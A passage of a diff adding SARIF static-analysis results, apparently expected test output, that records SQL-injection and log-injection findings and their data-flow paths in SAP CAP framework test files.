+ book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 11, + "endColumn" : 63 + } + }, + "message" : { + "text" : "cqn" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 28, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "cqn" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 31, + "startColumn" : 39, + "endColumn" : 43 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1cd6f1adc2ef8f7c:1", + "primaryLocationStartColumnFingerprint" : "32" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", 
+ "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 56, + "endColumn" : 60 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 32, + "endColumn" : 60 + } + }, + "message" : { + "text" : "`SELECT ... + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 18, + "endColumn" : 61 + } + }, + "message" : { + "text" : "cds.par ... 
+ book)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 11, + "endColumn" : 61 + } + }, + "message" : { + "text" : "cqn1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 31, + "startColumn" : 39, + "endColumn" : 43 + } + }, + "message" : { + "text" : "cqn1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 16, + "endColumn" : 29 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "eae426bf8fad0192:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 25, + "endColumn" : 29 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 16, + "endColumn" : 29 + } + }, + "message" : { + "text" : "\"CAP:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a 
[user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 47, + "endColumn" : 48 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e05b39891dddd161:1", + "primaryLocationStartColumnFingerprint" : "40" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 15, + "startColumn" : 24, + "endColumn" : 27 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 20 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 25 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 13, + "endColumn" : 25 + } + }, + "message" : { + "text" : "$" + } + } + }, { + "location" : { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 47, + "endColumn" : 48 + } + }, + "message" : { + "text" : "$" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 15, + "startColumn" : 24, + "endColumn" : 27 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 16, + "endColumn" : 29 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "4dc77ce4a9b7031e:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 25, + "endColumn" : 29 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 16, + "endColumn" : 29 + } + }, + "message" : { + "text" : "\"CAP:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { 
+ "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + 
} + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 103 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : 
"js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 47 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 21, + "endColumn" : 34 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 47 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 9, + "startColumn" : 38, + "endColumn" : 51 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 9, + "startColumn" : 36, + "endColumn" : 53 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 38 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 35, + "endColumn" : 43 + } + }, + "message" : { + "text" : "msg.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 32 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 7, + "startColumn" : 15, + "endColumn" : 43 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 108 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + }, + "message" : { + "text" : "messageToPass" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 106 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 9, + "startColumn" : 32, + "endColumn" : 45 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7c291d40b7c61d4f:1", + "primaryLocationStartColumnFingerprint" : "23" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 6, + "startColumn" : 33, + "endColumn" : 36 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 39, + "endColumn" : 47 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "{ messageToPass }" + } 
+ } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 21, + "endColumn" : 34 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 7, + "startColumn" : 19, + "endColumn" : 47 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 9, + "startColumn" : 38, + "endColumn" : 51 + } + }, + "message" : { + "text" : "messageToPass" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 114 + }, + "region" : { + "startLine" : 9, + "startColumn" : 36, + "endColumn" : 53 + } + }, + "message" : { + "text" : "{ messageToPass }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 122 + }, + "region" : { + "startLine" : 6, + "startColumn" : 29, + "endColumn" : 32 + } + }, + "message" : { + "text" : "msg" + } + } + }, { + "location" : { + "physicalLocation" : { + 